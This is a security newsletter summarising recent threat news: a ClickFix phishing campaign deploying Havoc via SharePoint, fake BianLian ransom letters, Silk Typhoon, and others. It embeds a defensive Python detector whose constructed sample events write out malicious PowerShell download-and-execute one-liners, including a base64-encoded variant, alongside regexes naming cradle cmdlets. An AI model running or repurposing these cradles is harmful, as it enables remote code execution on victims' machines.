Hello there 👋
Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories

New ClickFix Phishing Attack Unleashes Havoc C2 via Microsoft SharePoint
A slick ClickFix phishing campaign is tricking users into running malicious PowerShell scripts, deploying the Havoc C2 framework through Microsoft SharePoint. Blending into legit traffic with Microsoft Graph API, this attack’s a stealthy beast.
Key takeaways:
🕵️‍♂️ Phishing Lure: A new ClickFix campaign kicks off with phishing emails sporting an HTML attachment (“Documents.html”) that fakes an error, duping users into copying and running a malicious PowerShell command.
📂 SharePoint Hideout: The attack fetches a PowerShell script from an attacker-controlled SharePoint site, then grabs a Python script to load Havoc, an open-source C2 framework, as a sneaky DLL.
🔗 Stealthy Comms: Using Microsoft Graph API, Havoc masks its command-and-control traffic within SharePoint’s legit functions, making it a nightmare to spot amid trusted services.
💻 Full Control: Once deployed, Havoc gives attackers remote access to compromised systems, rivaling tools like Cobalt Strike—Fortinet flagged this crafty multi-stage assault.
🛡️ Stay Sharp: Users should dodge unknown email attachments and orgs must monitor SharePoint for odd activity to block this growing ClickFix threat.
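As an added example (not code from the newsletter, nor from Fortinet's report), here is a small Python detection pass over constructed process-creation events. It flags the pattern described above: a PowerShell download cradle pulling a script from a sharepoint.com URL, including when the command is hidden behind -EncodedCommand, while leaving an ordinary admin download alone. The log format, field names, hostnames and URLs are assumptions made for this example.

```python
"""Flag ClickFix-style PowerShell download cradles that fetch a script from SharePoint.

Added example, not code from the newsletter or from Fortinet. The "key=value"
event format, field names, hostnames and URLs below are assumptions/constructed.
"""
import base64
import re
from dataclasses import dataclass, field

# One process-creation event per line; cmd= takes the rest of the line (assumed format).
EVENT_RE = re.compile(
    r"^ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"parent=(?P<parent>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)
# Cmdlets and aliases commonly used to fetch and execute remote code.
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|"
    r"downloadstring|downloadfile|net\.webclient)\b", re.IGNORECASE)
# Script staged on a SharePoint tenant, as in the campaign described above.
SHAREPOINT_RE = re.compile(r"https?://[\w.-]*\.sharepoint\.com/\S+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    reasons: list = field(default_factory=list)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd: str):
    """Return the decoded -EncodedCommand payload if present, else None.

    PowerShell accepts -e, -ec and any prefix of -EncodedCommand, so match by prefix.
    """
    tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if not tok.startswith("-") or not name:
            continue
        if name in {"e", "ec"} or "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64/UTF-16LE, keep looking
    return None


def analyze_event(line: str):
    """Return a Finding for a suspicious PowerShell launch, or None."""
    m = EVENT_RE.match(line)
    if not m or m["image"].lower() not in POWERSHELL_IMAGES:
        return None
    cmd = m["cmd"]
    decoded = decode_encoded_command(cmd)
    text = cmd + ("\n" + decoded if decoded else "")  # inspect the decoded payload too
    reasons = []
    if CRADLE_RE.search(text):
        reasons.append("download cradle")
    if SHAREPOINT_RE.search(text):
        reasons.append("script fetched from sharepoint.com")
    if decoded is not None:
        reasons.append("payload hidden in -EncodedCommand")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    # A cradle alone is common in admin scripts; require a second signal to alert.
    if "download cradle" in reasons and len(reasons) >= 2:
        return Finding(m["ts"], m["host"], m["user"], reasons)
    return None


def scan(log_text: str):
    """Run analyze_event over every line and return the findings in log order."""
    return [f for f in (analyze_event(line) for line in log_text.splitlines()) if f]


# Constructed sample events (hosts, users and URLs are made up for this example).
_ENC_PAYLOAD = encode_powershell(
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://contoso-share.sharepoint.com/sites/hr/Shared%20Documents/stage.ps1')")
SAMPLE_EVENTS = "\n".join([
    # 1: ClickFix-style one-liner pasted by the user: hidden window, iwr + iex from SharePoint
    "ts=2025-03-05T10:02:11Z host=WS-07 user=alice parent=explorer.exe image=powershell.exe "
    "cmd=powershell -w hidden -c \"iex (iwr 'https://contoso-share.sharepoint.com/sites/hr/"
    "Shared%20Documents/Documents.ps1' -UseBasicParsing)\"",
    # 2: routine local backup script, nothing fetched remotely
    "ts=2025-03-05T10:05:00Z host=WS-07 user=SYSTEM parent=svchost.exe image=powershell.exe "
    "cmd=powershell -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    # 3: the same cradle, hidden behind -enc
    f"ts=2025-03-05T10:09:42Z host=WS-12 user=bob parent=explorer.exe image=powershell.exe "
    f"cmd=powershell -nop -enc {_ENC_PAYLOAD}",
    # 4: admin pulling an installer from an internal server: cradle only, no alert
    "ts=2025-03-05T10:15:03Z host=SRV-01 user=admin parent=cmd.exe image=pwsh.exe "
    "cmd=pwsh -c \"iwr https://updates.corp.example/agent.msi -OutFile C:\\Temp\\agent.msi\"",
    # 5: not PowerShell at all
    "ts=2025-03-05T10:16:30Z host=WS-07 user=alice parent=explorer.exe image=cmd.exe cmd=cmd /c dir",
])

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.user}: {', '.join(f.reasons)}")
```

Requiring a second signal alongside the cradle is the design choice worth copying: a bare iwr or DownloadString is everyday admin activity, so the alert keys on the combination the campaign actually uses (a SharePoint-hosted stage, an encoded or hidden launch) rather than on the cmdlet alone.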
Fake BianLian Ransom Notes Target U.S. CEOs in Bold Postal Mail Scam
Scammers posing as the BianLian ransomware gang are mailing fake ransom notes to U.S. CEOs, demanding Bitcoin via QR codes and Tor links. Experts say it’s a clever con with no real breach—don’t fall for it, verify threats!
Key takeaways:
🕵️‍♂️ Physical Scam: Fraudsters are sending physical ransom letters to U.S. CEOs, mimicking BianLian’s style with QR codes for Bitcoin payments and links to their dark web leak site, marked “TIME SENSITIVE READ IMMEDIATELY.”
📬 Unusual Tactic: Unlike typical digital ransomware demands, these mailed notes from a Boston address lack evidence of actual network breaches, raising red flags for GuidePoint Security analysts.
🔍 Inconsistencies Found: The letters feature polished English (unlike BianLian’s usual notes), fresh Bitcoin wallets, and no intrusion proof—experts peg it as a scam to trick executives into paying without verification.
💰 Fear-Based Profit: The scheme banks on fear, not facts, targeting execs with threats of data leaks, though the real BianLian group sticks to digital extortion, not snail mail.
🛡️ Stay Smart: Companies should ignore unverified demands, check systems for actual breaches, and report these fakes to authorities to shut down this postal ploy.
Silk Typhoon Hackers Pivot to IT Supply Chains for Network Breaches
Microsoft warns that Silk Typhoon, a Chinese cyber-espionage group, is now targeting IT supply chains, exploiting remote management tools and cloud services to hit downstream networks. With breaches spanning government, healthcare, and more, this shift amplifies the espionage game.
Key takeaways:
🕵️‍♂️ Tactic Shift: Silk Typhoon (aka Hafnium), a Chinese state-sponsored group, has moved from direct exploits to targeting IT supply chains, hitting remote management tools and cloud apps for initial access, Microsoft reports on March 5, 2025.
🔓 Access Tricks: Using stolen API keys and compromised credentials from GitHub and beyond, they breach IT providers—think identity management and RMM solutions—to reach customer networks across industries like government, healthcare, and defense.
🌐 Wide Reach: Confirmed hits span the U.S. and global sectors (IT, education, energy, NGOs), with Silk Typhoon leveraging zero-days like Ivanti’s CVE-2025-0282 and Palo Alto’s CVE-2024-3400 for persistence via web shells.
🛠️ Stealthy Moves: After a breach, they abuse legitimate services (e.g., Microsoft apps) and covert networks to stay hidden, aiming for long-term espionage while Microsoft shares IOCs to fight back.
🛡️ Defender’s Move: Orgs must secure APIs, update vulnerable appliances, and hunt for Silk Typhoon’s latest TTPs. The detection rules are out, so lock it down now!
YouTube Alerts Users to AI-Generated CEO Video Fueling Phishing Scams
YouTube’s warning: an AI-generated video of CEO Neal Mohan is being used in phishing attacks to steal creator credentials via fake monetization updates. Don’t click suspicious links. Scammers are exploiting private video shares to install malware or swipe logins.
Key takeaways:
🕵️‍♂️ AI Scam Alert: YouTube flagged a phishing campaign using an AI-crafted video of CEO Neal Mohan, shared privately to trick creators with fake monetization policy changes, reported on March 5, 2025.
📹 Sneaky Delivery: The video, pushed via phishing emails, links to “studio.youtube-plus[.]com,” a site mimicking YouTube’s Partner Program, aiming to nab login creds or drop malware.
🔒 Trust Eroded: Scammers exploit YouTube’s private video feature, prompting the company to stress it never contacts users this way.
🌍 Widespread Risk: Social media buzz and YouTube’s pinned community post highlight the scam’s reach, urging users to report shady channels and avoid unverified links.
🛡️ Stay Safe: Creators should skip unsolicited private video links, double-check domains, and lean on YouTube’s new hacked-account support tool to lock out these cons.
New Polyglot Malware Targets Aviation and Satellite Firms in UAE
Sneaky polyglot malware is hitting aviation and satellite firms in the UAE, hiding malicious payloads in legit-looking files. With critical transport orgs in the crosshairs, this attack’s evasion tactics are a wake-up call.
Key takeaways:
🕵️‍♂️ Stealthy Threat: An undocumented polyglot malware, blending multiple file formats (PDF, HTA, ZIP), is targeting aviation, satellite comms, and transport firms in the UAE, spotted by Positive Technologies in late 2024.
🔍 Evasion Master: It starts with phishing emails, using a benign PDF front to slip past security tools, then deploys HTA and ZIP payloads via PowerShell to dodge detection.
⚙️ Attack Chain: The malware leverages LNK files and obfuscated scripts to install backdoors, targeting critical orgs with sneaky persistence tricks.
🌍 High Stakes: Aimed at the UAE’s vital sectors, it’s unclear who’s behind it—state actors or cybercriminals—but the intent is serious disruption or espionage.
🛡️ Defense Up: Block risky file types (LNK, HTA, ZIP), scan emails rigorously, and train staff to spot phishing—multilayered security is the only way to fight this!
Top Tips of the Week

Threat Intelligence
- Collaborate across security teams for a holistic CTI approach. Break down silos and share insights for better threat awareness.
- Diversify your threat intelligence team. Different perspectives enhance analysis and interpretation of intelligence data.
- Integrate threat intelligence with SIEM tools. Enhance the capabilities of Security Information and Event Management for improved threat detection.
- Consider the human factor in CTI analysis. Recognize the role of human behavior in cyber threats for more effective defenses.
Threat Hunting
- Engage in threat intelligence forums. Participate in discussions to share insights and learn from others in the field.
- Implement threat intelligence metrics in cyber threat hunting. Track and measure the effectiveness of your efforts.
Custom Tooling
- Consider user experience in custom tool design. Intuitive interfaces enhance usability and encourage adoption.
Feature Video
The Pyramid of Pain models how much pain we can inflict on the bad guys. It shows that some IOCs (Indicators of Compromise) are more difficult for an adversary to change than others, and that denying the adversary certain indicators causes them a greater loss (more pain) than denying them others.
As defenders, we should aim to target the indicators that cause a greater loss to the adversary to bolster our defenses!
Learning Resources

The Rise of Session Takeovers
Session hijacking is on the rise. Attackers are stealing session tokens to bypass MFA and take over online accounts. This excellent presentation from the team at Flare covers everything you need to know.
It details the various methods cybercriminals use to hijack victim sessions and profit through dark web marketplaces and Telegram channels. The presentation concludes by exploring how enterprises can leverage AI tools and threat intelligence platforms to detect and revoke compromised sessions before damage occurs.
Master Docker Today!
Docker simplifies software deployment. It isolates applications and their dependencies, allowing you to deploy applications with ease. This great tutorial shows you how to run, manage, and optimize containerized applications using Docker, Docker Compose, and Podman.
It is a must-watch if you want to up your Docker skills and learn to pull and run images, map ports for web access, and build lightweight, efficient containers!
Ditch OBS, Use Meld Studio Instead
Content creation helps you learn complex topics, support others on their learning journey, and stand out from the crowd. I’ve been using OBS for years to make videos, but a new kid on the block is offering a more user-friendly and efficient alternative: Meld Studio.
This video covers everything you need to know to get started using Meld and create your perfect streaming or recording setup in minutes. Meld provides a streamlined experience that caters to 99% of content creators. Check it out now!
The Evolution of Cyber Mercenaries
In this eye-opening discussion, Tim Maurer highlights the evolving role of cyber mercenaries. These hackers operate outside traditional state structures but often act on behalf of governments, offering them plausible deniability and additional capabilities.
The conversation highlights the complexities of global cyber conflict, showing how different nations control (or fail to control) their cyber proxies and the potential problems that can unfold. A must-watch for any cyber threat intelligence professional!